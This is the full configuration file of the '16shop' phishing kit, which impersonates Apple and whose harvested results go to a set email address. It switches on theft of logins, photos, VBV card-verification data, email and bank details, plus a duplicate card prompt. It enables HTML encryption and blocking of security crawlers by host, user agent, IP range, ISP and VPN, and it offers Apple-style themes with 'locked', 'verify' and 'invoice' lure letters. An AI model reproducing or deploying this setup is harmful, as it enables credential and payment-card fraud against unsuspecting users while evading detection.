[ YOUR EMAIL ]
email_result= "proscampage@16shop.us"
[ LOCK PLATFORM = "iPhone" "iPad" "iPod" "Mac OS X" "Mac OS 9" ]
lock_platform= "on"
[ SENDER MAIL ]
sender_mail= "proscampage@16shop.us"
[ www.yourhost.com/?16shop ]
site_param_on= "on"
site_parameter= "16shop"
[ OTHER SETTING ]
site_password= ""
site_pass_on= ""
send_login= "on"
mix_result= "on"
get_photo= "on"
get_vbv= "on"
get_email= "on"
get_bank= "on"
double_cc= "on"

[ BLOCKER AND ENC SETTING ]
onetime= "on"
encrypt_html= "on"
block_host= "on"
block_ua= "on"
block_iprange= "on"
block_isp= "on"
block_vpn= "on"

[ THEME OPTION ]

[ http://16shop.online/admin/assets/images/theme_classic.png ][ clasic ]
[ http://16shop.online/admin/assets/images/theme_icloud.png ][ icloud ]
[ http://16shop.online/admin/assets/images/theme_apple.png ][ apple ]

theme= "apple"

[ LETTER OPTION ] [ locked ] [ verify ] [ invoice ]
letter= "locked"

mix_email= ""